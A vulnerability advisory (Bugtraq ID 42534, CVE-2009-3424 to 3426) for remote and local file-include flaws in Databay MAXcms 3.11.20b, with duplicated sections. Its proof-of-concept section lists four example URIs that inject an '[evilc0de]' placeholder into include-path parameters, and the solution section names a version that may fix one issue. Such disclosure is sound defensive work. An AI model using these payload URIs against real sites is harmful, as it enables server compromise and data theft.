Databay MAXcms Multiple File Include Vulnerabilities
BID:42534
Info
Databay MAXcms Multiple File Include Vulnerabilities
| Bugtraq ID: | 42534 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-3424 CVE-2009-3425 CVE-2009-3426 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 01 2009 12:00AM |
| Updated: | Aug 19 2010 10:43PM |
| Credit: | NoGe GoLd_M |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Databay MAXcms Multiple File Include Vulnerabilities
MAXcms is prone to remote and local file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer; other attacks are also possible.
Databay MAXcms 3.11.20b is vulnerable; other versions may also be affected.
MAXcms is prone to remote and local file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer; other attacks are also possible.
Databay MAXcms 3.11.20b is vulnerable; other versions may also be affected.
Exploit / POC
Databay MAXcms Multiple File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/includes/InstantSite/inc.is_root.php?is_projectPath=[evilc0de]
http://www.example.com/classes/class.Tree.php?GLOBALS[thCMS_root]=[evilc0de]
http://www.example.com/class.thcsm_user.php?is_path=[evilc0de]
http://www.example.com/modul/mod.users.php?thCMS_root=[evilc0de]
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/includes/InstantSite/inc.is_root.php?is_projectPath=[evilc0de]
http://www.example.com/classes/class.Tree.php?GLOBALS[thCMS_root]=[evilc0de]
http://www.example.com/class.thcsm_user.php?is_path=[evilc0de]
http://www.example.com/modul/mod.users.php?thCMS_root=[evilc0de]
Solution / Fix
Databay MAXcms Multiple File Include Vulnerabilities
Solution:
Reports indicate Databay MAXcms 3.16.9 may fix issue #2. Please see the references for more details.
Solution:
Reports indicate Databay MAXcms 3.16.9 may fix issue #2. Please see the references for more details.